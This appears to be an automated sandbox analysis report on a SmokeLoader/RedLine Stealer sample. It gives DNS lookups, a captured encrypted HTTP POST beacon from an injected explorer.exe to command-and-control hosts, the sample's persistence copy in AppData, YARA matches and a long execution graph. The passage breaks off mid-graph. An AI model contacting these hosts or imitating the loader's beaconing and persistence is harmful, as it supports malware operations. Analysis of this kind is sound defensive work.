              Feb 7, 2023 20:05:08.936582088 CET5051353192.168.2.78.8.8.8
              Feb 7, 2023 20:05:10.893774986 CET53505138.8.8.8192.168.2.7
              Feb 7, 2023 20:05:11.939722061 CET53505138.8.8.8192.168.2.7
              Feb 7, 2023 20:05:12.966223001 CET53505138.8.8.8192.168.2.7
              TimestampSource IPDest IPChecksumCodeType
              Feb 7, 2023 20:05:11.939827919 CET192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
              Feb 7, 2023 20:05:12.966365099 CET192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Feb 7, 2023 20:05:06.647430897 CET192.168.2.78.8.8.80x921eStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:06.864218950 CET192.168.2.78.8.8.80x19d6Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:07.911704063 CET192.168.2.78.8.8.80x19d6Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:08.936582088 CET192.168.2.78.8.8.80x19d6Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Feb 7, 2023 20:05:06.667443037 CET8.8.8.8192.168.2.70x921eNo error (0)host-file-host6.com185.246.221.63A (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:10.893774986 CET8.8.8.8192.168.2.70x19d6Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:11.939722061 CET8.8.8.8192.168.2.70x19d6Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              Feb 7, 2023 20:05:12.966223001 CET8.8.8.8192.168.2.70x19d6Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              • uclahet.com
                • host-file-host6.com
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.749722185.246.221.6380C:\Windows\explorer.exe
              TimestampkBytes transferredDirectionData
              Feb 7, 2023 20:05:06.705308914 CET284OUTPOST / HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://uclahet.com/
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Length: 306
              Host: host-file-host6.com
              Feb 7, 2023 20:05:06.705343962 CET284OUTData Raw: 10 87 f6 99 6d 82 a7 b5 c2 37 77 41 79 ca e4 8f 31 62 a3 46 d2 41 68 9b be eb a8 85 fb a1 95 80 6c b5 59 a5 11 1c c4 92 e8 d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 31 82 a4 7a
              Data Ascii: m7wAy1bFAhlYwmwu$f]d1ze|}gh&**Znv9:"ceHb7i6|\L7[As[qk.%?0=SiLH<+&2S!>w(quFE!D
              Feb 7, 2023 20:05:06.850627899 CET285INHTTP/1.1 200 OK
              Server: nginx/1.20.2
              Date: Tue, 07 Feb 2023 19:05:06 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
              Data Ascii: fYour IP blocked0


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:20:04:48
              Start date:07/02/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:198144 bytes
              MD5 hash:04A988E37B8EA5FACD28A7D42764F597
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:1
              Start time:20:04:54
              Start date:07/02/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:198144 bytes
              MD5 hash:04A988E37B8EA5FACD28A7D42764F597
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:2
              Start time:20:05:00
              Start date:07/02/2023
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff75ed40000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:11
              Start time:20:05:41
              Start date:07/02/2023
              Path:C:\Users\user\AppData\Roaming\vhefigi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vhefigi
              Imagebase:0x400000
              File size:198144 bytes
              MD5 hash:04A988E37B8EA5FACD28A7D42764F597
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 46%, ReversingLabs
              • Detection: 36%, Virustotal, Browse
              Reputation:low

              Target ID:12
              Start time:20:05:49
              Start date:07/02/2023
              Path:C:\Users\user\AppData\Roaming\vhefigi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vhefigi
              Imagebase:0x400000
              File size:198144 bytes
              MD5 hash:04A988E37B8EA5FACD28A7D42764F597
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low

              Reset < >

                Execution Graph

                Execution Coverage:3.6%
                Dynamic/Decrypted Code Coverage:4.2%
                Signature Coverage:3.4%
                Total number of Nodes:1397
                Total number of Limit Nodes:12
                execution_graph 8559 4070f2 8596 40b9dc 8559->8596 8561 4070fe GetStartupInfoW 8563 407121 8561->8563 8597 40ad36 HeapCreate 8563->8597 8565 407171 8599 40965b GetModuleHandleW 8565->8599 8569 407182 __RTC_Initialize 8633 40d4db 8569->8633 8570 4070c9 _fast_error_exit 68 API calls 8570->8569 8572 407190 8573 40719c GetCommandLineW 8572->8573 8719 40cb0f 8572->8719 8648 40d47e GetEnvironmentStringsW 8573->8648 8577 4071ab 8654 40d3d0 GetModuleFileNameW 8577->8654 8579 4071b5 8580 4071c0 8579->8580 8581 40cb0f __amsg_exit 68 API calls 8579->8581 8658 40d1a1 8580->8658 8581->8580 8584 4071d1 8671 40cbce 8584->8671 8585 40cb0f __amsg_exit 68 API calls 8585->8584 8587 4071d8 8588 4071e3 __wwincmdln 8587->8588 8589 40cb0f __amsg_exit 68 API calls 8587->8589 8677 404f68 8588->8677 8589->8588 8592 407212 8729 40cdab 8592->8729 8595 407217 ___BuildCatchObjectHelper 8596->8561 8598 407165 8597->8598 8598->8565 8711 4070c9 8598->8711 8600 409676 8599->8600 8601 40966f 8599->8601 8603 409680 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8600->8603 8604 4097de 8600->8604 8732 40cadf 8601->8732 8605 4096c9 TlsAlloc 8603->8605 8793 409375 8604->8793 8609 407177 8605->8609 8610 409717 TlsSetValue 8605->8610 8609->8569 8609->8570 8610->8609 8611 409728 8610->8611 8736 40cdc9 8611->8736 8616 40924b __encode_pointer 7 API calls 8617 409748 8616->8617 8618 40924b __encode_pointer 7 API calls 8617->8618 8619 409758 8618->8619 8620 40924b __encode_pointer 7 API calls 8619->8620 8621 409768 8620->8621 8755 40ad66 8621->8755 8628 4092c6 __decode_pointer 6 API calls 8629 4097bc 8628->8629 8629->8604 8630 4097c3 8629->8630 8775 4093b2 8630->8775 8632 4097cb GetCurrentThreadId 8632->8609 9126 40b9dc 8633->9126 8635 40d4e7 GetStartupInfoA 8636 4101bf __calloc_crt 68 API calls 8635->8636 8642 40d508 8636->8642 8637 40d726 ___BuildCatchObjectHelper 8637->8572 8638 40d6a3 GetStdHandle 8641 40d66d 8638->8641 8639 4101bf __calloc_crt 68 API calls 8639->8642 8640 40d708 SetHandleCount 8640->8637 8641->8637 8641->8638 8641->8640 8643 40d6b5 GetFileType 8641->8643 8644 410704 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8641->8644 8642->8637 8642->8639 8642->8641 8647 40d5f0 8642->8647 8643->8641 8644->8641 8645 40d619 GetFileType 8645->8647 8646 410704 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8646->8647 8647->8637 8647->8641 8647->8645 8647->8646 8649 40d493 8648->8649 8650 40d48f 8648->8650 8651 41017a __malloc_crt 68 API calls 8649->8651 8650->8577 8652 40d4b4 _memcpy_s 8651->8652 8653 40d4bb FreeEnvironmentStringsW 8652->8653 8653->8577 8655 40d405 _wparse_cmdline 8654->8655 8656 41017a __malloc_crt 68 API calls 8655->8656 8657 40d448 _wparse_cmdline 8655->8657 8656->8657 8657->8579 8659 4071c6 8658->8659 8660 40d1b9 _wcslen 8658->8660 8659->8584 8659->8585 8661 4101bf __calloc_crt 68 API calls 8660->8661 8662 40d1dd _wcslen 8661->8662 8662->8659 8663 40d242 8662->8663 8665 4101bf __calloc_crt 68 API calls 8662->8665 8666 40d268 8662->8666 8669 40d227 8662->8669 9127 4113ca 8662->9127 8664 406f3b ___free_lconv_num 68 API calls 8663->8664 8664->8659 8665->8662 8667 406f3b ___free_lconv_num 68 API calls 8666->8667 8667->8659 8669->8662 8670 40689f __invoke_watson 10 API calls 8669->8670 8670->8669 8672 40cbdc __IsNonwritableInCurrentImage 8671->8672 9136 408947 8672->9136 8674 40cbfa __initterm_e 8676 40cc19 __IsNonwritableInCurrentImage __initterm 8674->8676 9140 40990f 8674->9140 8676->8587 8678 404f85 8677->8678 8679 405009 8677->8679 9272 407004 8678->9272 8682 40501d SetCriticalSectionSpinCount 8679->8682 8683 40502b 8679->8683 8681 404f90 9289 406fc9 DeleteFileA 8681->9289 8682->8679 8685 40503c GetTextFaceW EnumTimeFormatsA 8683->8685 8687 405057 8683->8687 8685->8683 8686 404f96 9295 405da5 8686->9295 9240 404bb9 8687->9240 8690 405066 8690->8592 8726 40cd7f 8690->8726 8695 404fc0 9313 405635 8695->9313 8698 405a38 std::_String_base::_Xlen 76 API calls 8699 404fd5 8698->8699 9316 406375 8699->9316 8702 405635 ctype 68 API calls 8703 404feb 8702->8703 8704 406f3b ___free_lconv_num 68 API calls 8703->8704 8705 404ff1 8704->8705 9332 406efb 8705->9332 8712 4070d7 8711->8712 8713 4070dc 8711->8713 8714 40cfc2 __FF_MSGBANNER 68 API calls 8712->8714 8715 40ce17 __NMSG_WRITE 68 API calls 8713->8715 8714->8713 8716 4070e4 8715->8716 8717 40cb63 _doexit 3 API calls 8716->8717 8718 4070ee 8717->8718 8718->8565 8720 40cfc2 __FF_MSGBANNER 68 API calls 8719->8720 8721 40cb19 8720->8721 8722 40ce17 __NMSG_WRITE 68 API calls 8721->8722 8723 40cb21 8722->8723 8724 4092c6 __decode_pointer 6 API calls 8723->8724 8725 40719b 8724->8725 8725->8573 10245 40cc53 8726->10245 8728 40cd90 8728->8592 8730 40cc53 _doexit 68 API calls 8729->8730 8731 40cdb6 8730->8731 8731->8595 8733 40caea Sleep GetModuleHandleW 8732->8733 8734 40cb08 8733->8734 8735 409675 8733->8735 8734->8733 8734->8735 8735->8600 8804 4092bd 8736->8804 8738 40cdd1 __init_pointers __initp_misc_winsig 8807 40a69a 8738->8807 8741 40924b __encode_pointer 7 API calls 8742 40972d 8741->8742 8743 40924b TlsGetValue 8742->8743 8744 409263 8743->8744 8745 409284 GetModuleHandleW 8743->8745 8744->8745 8746 40926d TlsGetValue 8744->8746 8747 409294 8745->8747 8748 40929f GetProcAddress 8745->8748 8751 409278 8746->8751 8749 40cadf __crt_waiting_on_module_handle 2 API calls 8747->8749 8750 40927c 8748->8750 8752 40929a 8749->8752 8753 4092b7 8750->8753 8754 4092af RtlEncodePointer 8750->8754 8751->8745 8751->8750 8752->8748 8752->8753 8753->8616 8754->8753 8758 40ad71 8755->8758 8757 409775 8757->8604 8759 4092c6 TlsGetValue 8757->8759 8758->8757 8810 410704 8758->8810 8760 4092de 8759->8760 8761 4092ff GetModuleHandleW 8759->8761 8760->8761 8762 4092e8 TlsGetValue 8760->8762 8763 40931a GetProcAddress 8761->8763 8764 40930f 8761->8764 8767 4092f3 8762->8767 8766 4092f7 8763->8766 8765 40cadf __crt_waiting_on_module_handle 2 API calls 8764->8765 8768 409315 8765->8768 8766->8604 8769 4101bf 8766->8769 8767->8761 8767->8766 8768->8763 8768->8766 8770 4101c8 8769->8770 8772 4097a2 8770->8772 8773 4101e6 Sleep 8770->8773 8815 40ac18 8770->8815 8772->8604 8772->8628 8774 4101fb 8773->8774 8774->8770 8774->8772 9105 40b9dc 8775->9105 8777 4093be GetModuleHandleW 8778 4093d4 8777->8778 8779 4093ce 8777->8779 8781 409410 8778->8781 8782 4093ec GetProcAddress GetProcAddress 8778->8782 8780 40cadf __crt_waiting_on_module_handle 2 API calls 8779->8780 8780->8778 8783 40aee2 __lock 64 API calls 8781->8783 8782->8781 8784 40942f InterlockedIncrement 8783->8784 9106 409487 8784->9106 8787 40aee2 __lock 64 API calls 8788 409450 8787->8788 9109 40e519 InterlockedIncrement 8788->9109 8790 40946e 9121 409490 8790->9121 8792 40947b ___BuildCatchObjectHelper 8792->8632 8794 40938b 8793->8794 8795 40937f 8793->8795 8797 4093ad 8794->8797 8798 40939f TlsFree 8794->8798 8796 4092c6 __decode_pointer 6 API calls 8795->8796 8796->8794 8799 40adcd DeleteCriticalSection 8797->8799 8801 40ade5 8797->8801 8798->8797 8800 406f3b ___free_lconv_num 68 API calls 8799->8800 8800->8797 8802 40adf7 DeleteCriticalSection 8801->8802 8803 40ae05 8801->8803 8802->8801 8803->8609 8805 40924b __encode_pointer 7 API calls 8804->8805 8806 4092c4 8805->8806 8806->8738 8808 40924b __encode_pointer 7 API calls 8807->8808 8809 40a6a4 8808->8809 8809->8741 8814 40b9dc 8810->8814 8812 410710 InitializeCriticalSectionAndSpinCount 8813 410754 ___BuildCatchObjectHelper 8812->8813 8813->8758 8814->8812 8816 40ac24 ___BuildCatchObjectHelper 8815->8816 8817 40ac3c 8816->8817 8827 40ac5b _memset 8816->8827 8828 407a37 8817->8828 8821 40accd RtlAllocateHeap 8821->8827 8823 40ac51 ___BuildCatchObjectHelper 8823->8770 8827->8821 8827->8823 8834 40aee2 8827->8834 8841 40b6f4 8827->8841 8847 40ad14 8827->8847 8850 409935 8827->8850 8853 409499 GetLastError 8828->8853 8830 407a3c 8831 4069c7 8830->8831 8832 4092c6 __decode_pointer 6 API calls 8831->8832 8833 4069d7 __invoke_watson 8832->8833 8835 40aef7 8834->8835 8836 40af0a EnterCriticalSection 8834->8836 8900 40ae1f 8835->8900 8836->8827 8838 40aefd 8838->8836 8839 40cb0f __amsg_exit 67 API calls 8838->8839 8840 40af09 8839->8840 8840->8836 8843 40b722 8841->8843 8842 40b7bb 8846 40b7c4 8842->8846 9100 40b30b 8842->9100 8843->8842 8843->8846 9093 40b25b 8843->9093 8846->8827 9104 40ae08 LeaveCriticalSection 8847->9104 8849 40ad1b 8849->8827 8851 4092c6 __decode_pointer 6 API calls 8850->8851 8852 409945 8851->8852 8852->8827 8867 409341 TlsGetValue 8853->8867 8856 409506 SetLastError 8856->8830 8857 4101bf __calloc_crt 65 API calls 8858 4094c4 8857->8858 8858->8856 8859 4092c6 __decode_pointer 6 API calls 8858->8859 8860 4094de 8859->8860 8861 4094e5 8860->8861 8862 4094fd 8860->8862 8864 4093b2 __mtinit 65 API calls 8861->8864 8872 406f3b 8862->8872 8865 4094ed GetCurrentThreadId 8864->8865 8865->8856 8866 409503 8866->8856 8868 409371 8867->8868 8869 409356 8867->8869 8868->8856 8868->8857 8870 4092c6 __decode_pointer 6 API calls 8869->8870 8871 409361 TlsSetValue 8870->8871 8871->8868 8874 406f47 ___BuildCatchObjectHelper 8872->8874 8873 406fc0 _realloc ___BuildCatchObjectHelper 8873->8866 8874->8873 8875 406f86 8874->8875 8877 40aee2 __lock 66 API calls 8874->8877 8875->8873 8876 406f9b HeapFree 8875->8876 8876->8873 8878 406fad 8876->8878 8881 406f5e ___sbh_find_block 8877->8881 8879 407a37 strtoxl 66 API calls 8878->8879 8880 406fb2 GetLastError 8879->8880 8880->8873 8884 406f78 8881->8884 8885 40af45 8881->8885 8892 406f91 8884->8892 8886 40af84 8885->8886 8891 40b226 8885->8891 8887 40b170 VirtualFree 8886->8887 8886->8891 8888 40b1d4 8887->8888 8889 40b1e3 VirtualFree HeapFree 8888->8889 8888->8891 8895 407a80 8889->8895 8891->8884 8899 40ae08 LeaveCriticalSection 8892->8899 8894 406f98 8894->8875 8896 407a98 8895->8896 8897 407ac7 8896->8897 8898 407abf __VEC_memcpy 8896->8898 8897->8891 8898->8897 8899->8894 8901 40ae2b ___BuildCatchObjectHelper 8900->8901 8902 40ae51 8901->8902 8926 40cfc2 8901->8926 8908 40ae61 ___BuildCatchObjectHelper 8902->8908 8972 41017a 8902->8972 8908->8838 8910 40ae82 8913 40aee2 __lock 68 API calls 8910->8913 8911 40ae73 8912 407a37 strtoxl 68 API calls 8911->8912 8912->8908 8915 40ae89 8913->8915 8916 40ae91 8915->8916 8917 40aebd 8915->8917 8918 410704 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8916->8918 8919 406f3b ___free_lconv_num 68 API calls 8917->8919 8921 40ae9c 8918->8921 8920 40aeae 8919->8920 8978 40aed9 8920->8978 8921->8920 8923 406f3b ___free_lconv_num 68 API calls 8921->8923 8924 40aea8 8923->8924 8925 407a37 strtoxl 68 API calls 8924->8925 8925->8920 8981 41137f 8926->8981 8929 41137f __set_error_mode 68 API calls 8931 40cfd6 8929->8931 8930 40ce17 __NMSG_WRITE 68 API calls 8932 40cfee 8930->8932 8931->8930 8933 40ae40 8931->8933 8934 40ce17 __NMSG_WRITE 68 API calls 8932->8934 8935 40ce17 8933->8935 8934->8933 8936 40ce2b 8935->8936 8937 41137f __set_error_mode 65 API calls 8936->8937 8968 40ae47 8936->8968 8938 40ce4d 8937->8938 8939 40cf8b GetStdHandle 8938->8939 8941 41137f __set_error_mode 65 API calls 8938->8941 8940 40cf99 _strlen 8939->8940 8939->8968 8944 40cfb2 WriteFile 8940->8944 8940->8968 8942 40ce5e 8941->8942 8942->8939 8943 40ce70 8942->8943 8943->8968 8987 407383 8943->8987 8944->8968 8947 40cea6 GetModuleFileNameA 8949 40cec4 8947->8949 8953 40cee7 _strlen 8947->8953 8951 407383 _strcpy_s 65 API calls 8949->8951 8952 40ced4 8951->8952 8952->8953 8955 40689f __invoke_watson 10 API calls 8952->8955 8954 40cf2a 8953->8954 9003 4112ca 8953->9003 9012 411256 8954->9012 8955->8953 8960 40cf4e 8962 411256 _strcat_s 65 API calls 8960->8962 8961 40689f __invoke_watson 10 API calls 8961->8960 8964 40cf62 8962->8964 8963 40689f __invoke_watson 10 API calls 8963->8954 8965 40689f __invoke_watson 10 API calls 8964->8965 8967 40cf73 8964->8967 8965->8967 9021 4110ed 8967->9021 8969 40cb63 8968->8969 9059 40cb38 GetModuleHandleW 8969->9059 8974 410183 8972->8974 8975 40ae6c 8974->8975 8976 41019a Sleep 8974->8976 9062 40743a 8974->9062 8975->8910 8975->8911 8977 4101af 8976->8977 8977->8974 8977->8975 9092 40ae08 LeaveCriticalSection 8978->9092 8980 40aee0 8980->8908 8982 41138e 8981->8982 8983 40cfc9 8982->8983 8984 407a37 strtoxl 68 API calls 8982->8984 8983->8929 8983->8931 8985 4113b1 8984->8985 8986 4069c7 strtoxl 6 API calls 8985->8986 8986->8983 8988 407394 8987->8988 8989 40739b 8987->8989 8988->8989 8994 4073c1 8988->8994 8990 407a37 strtoxl 68 API calls 8989->8990 8991 4073a0 8990->8991 8992 4069c7 strtoxl 6 API calls 8991->8992 8993 4073af 8992->8993 8993->8947 8996 40689f 8993->8996 8994->8993 8995 407a37 strtoxl 68 API calls 8994->8995 8995->8991 9048 407610 8996->9048 8998 4068cc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8999 4069a8 GetCurrentProcess TerminateProcess 8998->8999 9000 40699c __invoke_watson 8998->9000 9050 40730b 8999->9050 9000->8999 9002 4069c5 9002->8947 9007 4112dc 9003->9007 9004 4112e0 9005 40cf17 9004->9005 9006 407a37 strtoxl 68 API calls 9004->9006 9005->8954 9005->8963 9008 4112fc 9006->9008 9007->9004 9007->9005 9010 411326 9007->9010 9009 4069c7 strtoxl 6 API calls 9008->9009 9009->9005 9010->9005 9011 407a37 strtoxl 68 API calls 9010->9011 9011->9008 9013 41126e 9012->9013 9016 411267 9012->9016 9014 407a37 strtoxl 68 API calls 9013->9014 9015 411273 9014->9015 9017 4069c7 strtoxl 6 API calls 9015->9017 9016->9013 9018 4112a2 9016->9018 9019 40cf3d 9017->9019 9018->9019 9020 407a37 strtoxl 68 API calls 9018->9020 9019->8960 9019->8961 9020->9015 9022 4092bd _doexit 7 API calls 9021->9022 9023 4110fd 9022->9023 9024 411110 LoadLibraryA 9023->9024 9028 411198 9023->9028 9025 411125 GetProcAddress 9024->9025 9026 41123a 9024->9026 9025->9026 9029 41113b 9025->9029 9026->8968 9027 4111c2 9030 4092c6 __decode_pointer 6 API calls 9027->9030 9045 4111ed 9027->9045 9028->9027 9031 4092c6 __decode_pointer 6 API calls 9028->9031 9032 40924b __encode_pointer 7 API calls 9029->9032 9041 411205 9030->9041 9034 4111b5 9031->9034 9035 411141 GetProcAddress 9032->9035 9033 4092c6 __decode_pointer 6 API calls 9033->9026 9036 4092c6 __decode_pointer 6 API calls 9034->9036 9037 40924b __encode_pointer 7 API calls 9035->9037 9036->9027 9038 411156 GetProcAddress 9037->9038 9039 40924b __encode_pointer 7 API calls 9038->9039 9040 41116b GetProcAddress 9039->9040 9042 40924b __encode_pointer 7 API calls 9040->9042 9043 4092c6 __decode_pointer 6 API calls 9041->9043 9041->9045 9044 411180 9042->9044 9043->9045 9044->9028 9046 41118a GetProcAddress 9044->9046 9045->9033 9047 40924b __encode_pointer 7 API calls 9046->9047 9047->9028 9049 40761c __VEC_memzero 9048->9049 9049->8998 9051 407313 9050->9051 9052 407315 IsDebuggerPresent 9050->9052 9051->9002 9058 409243 9052->9058 9055 40d8de SetUnhandledExceptionFilter UnhandledExceptionFilter 9056 40d903 GetCurrentProcess TerminateProcess 9055->9056 9057 40d8fb __invoke_watson 9055->9057 9056->9002 9057->9056 9058->9055 9060 40cb5c ExitProcess 9059->9060 9061 40cb4c GetProcAddress 9059->9061 9061->9060 9063 4074ed 9062->9063 9073 40744c 9062->9073 9064 409935 __calloc_impl 6 API calls 9063->9064 9065 4074f3 9064->9065 9067 407a37 strtoxl 67 API calls 9065->9067 9066 40cfc2 __FF_MSGBANNER 67 API calls 9071 40745d 9066->9071 9079 4074e5 9067->9079 9069 40ce17 __NMSG_WRITE 67 API calls 9069->9071 9070 4074a9 RtlAllocateHeap 9070->9073 9071->9066 9071->9069 9072 40cb63 _doexit 3 API calls 9071->9072 9071->9073 9072->9071 9073->9070 9073->9071 9074 4074d9 9073->9074 9076 409935 __calloc_impl 6 API calls 9073->9076 9077 4074de 9073->9077 9073->9079 9080 4073eb 9073->9080 9075 407a37 strtoxl 67 API calls 9074->9075 9075->9077 9076->9073 9078 407a37 strtoxl 67 API calls 9077->9078 9078->9079 9079->8974 9081 4073f7 ___BuildCatchObjectHelper 9080->9081 9082 407428 ___BuildCatchObjectHelper 9081->9082 9083 40aee2 __lock 68 API calls 9081->9083 9082->9073 9084 40740d 9083->9084 9085 40b6f4 ___sbh_alloc_block 5 API calls 9084->9085 9086 407418 9085->9086 9088 407431 9086->9088 9091 40ae08 LeaveCriticalSection 9088->9091 9090 407438 9090->9082 9091->9090 9092->8980 9094 40b2a2 HeapAlloc 9093->9094 9095 40b26e HeapReAlloc 9093->9095 9097 40b28c 9094->9097 9098 40b2c5 VirtualAlloc 9094->9098 9096 40b290 9095->9096 9095->9097 9096->9094 9097->8842 9098->9097 9099 40b2df HeapFree 9098->9099 9099->9097 9101 40b322 VirtualAlloc 9100->9101 9103 40b369 9101->9103 9103->8846 9104->8849 9105->8777 9124 40ae08 LeaveCriticalSection 9106->9124 9108 409449 9108->8787 9110 40e537 InterlockedIncrement 9109->9110 9111 40e53a 9109->9111 9110->9111 9112 40e544 InterlockedIncrement 9111->9112 9113 40e547 9111->9113 9112->9113 9114 40e551 InterlockedIncrement 9113->9114 9115 40e554 9113->9115 9114->9115 9116 40e55e InterlockedIncrement 9115->9116 9118 40e561 9115->9118 9116->9118 9117 40e57a InterlockedIncrement 9117->9118 9118->9117 9119 40e58a InterlockedIncrement 9118->9119 9120 40e595 InterlockedIncrement 9118->9120 9119->9118 9120->8790 9125 40ae08 LeaveCriticalSection 9121->9125 9123 409497 9123->8792 9124->9108 9125->9123 9126->8635 9128 4113e2 9127->9128 9129 4113db 9127->9129 9130 407a37 strtoxl 68 API calls 9128->9130 9129->9128 9133 41140e 9129->9133 9131 4113e7 9130->9131 9132 4069c7 strtoxl 6 API calls 9131->9132 9134 4113f6 9132->9134 9133->9134 9135 407a37 strtoxl 68 API calls 9133->9135 9134->8662 9135->9131 9137 40894d 9136->9137 9138 40924b __encode_pointer 7 API calls 9137->9138 9139 408965 9137->9139 9138->9137 9139->8674 9143 4098d3 9140->9143 9142 40991c 9142->8676 9144 4098df ___BuildCatchObjectHelper 9143->9144 9151 40cb7b 9144->9151 9150 409900 ___BuildCatchObjectHelper 9150->9142 9152 40aee2 __lock 68 API calls 9151->9152 9153 4098e4 9152->9153 9154 4097e8 9153->9154 9155 4092c6 __decode_pointer 6 API calls 9154->9155 9156 4097fc 9155->9156 9157 4092c6 __decode_pointer 6 API calls 9156->9157 9158 40980c 9157->9158 9159 40988f 9158->9159 9174 410259 9158->9174 9171 409909 9159->9171 9161 40924b __encode_pointer 7 API calls 9162 409884 9161->9162 9165 40924b __encode_pointer 7 API calls 9162->9165 9163 40984e 9163->9159 9167 41020b __realloc_crt 74 API calls 9163->9167 9168 409864 9163->9168 9164 40982a 9164->9163 9170 409876 9164->9170 9187 41020b 9164->9187 9165->9159 9167->9168 9168->9159 9169 40924b __encode_pointer 7 API calls 9168->9169 9169->9170 9170->9161 9236 40cb84 9171->9236 9175 410265 ___BuildCatchObjectHelper 9174->9175 9176 410292 9175->9176 9177 410275 9175->9177 9179 4102d3 HeapSize 9176->9179 9182 40aee2 __lock 68 API calls 9176->9182 9178 407a37 strtoxl 68 API calls 9177->9178 9181 41027a 9178->9181 9180 41028a ___BuildCatchObjectHelper 9179->9180 9180->9164 9183 4069c7 strtoxl 6 API calls 9181->9183 9184 4102a2 ___sbh_find_block 9182->9184 9183->9180 9192 4102f3 9184->9192 9190 410214 9187->9190 9189 410253 9189->9163 9190->9189 9191 410234 Sleep 9190->9191 9196 414453 9190->9196 9191->9190 9195 40ae08 LeaveCriticalSection 9192->9195 9194 4102ce 9194->9179 9194->9180 9195->9194 9197 41445f ___BuildCatchObjectHelper 9196->9197 9198 414474 9197->9198 9199 414466 9197->9199 9201 414487 9198->9201 9202 41447b 9198->9202 9200 40743a _malloc 68 API calls 9199->9200 9221 41446e _realloc ___BuildCatchObjectHelper 9200->9221 9209 4145f9 9201->9209 9223 414494 _memcpy_s ___sbh_resize_block ___sbh_find_block 9201->9223 9203 406f3b ___free_lconv_num 68 API calls 9202->9203 9203->9221 9204 41462c 9206 409935 __calloc_impl 6 API calls 9204->9206 9205 40aee2 __lock 68 API calls 9205->9223 9208 414632 9206->9208 9207 4145fe HeapReAlloc 9207->9209 9207->9221 9210 407a37 strtoxl 68 API calls 9208->9210 9209->9204 9209->9207 9211 414650 9209->9211 9212 409935 __calloc_impl 6 API calls 9209->9212 9215 414646 9209->9215 9210->9221 9213 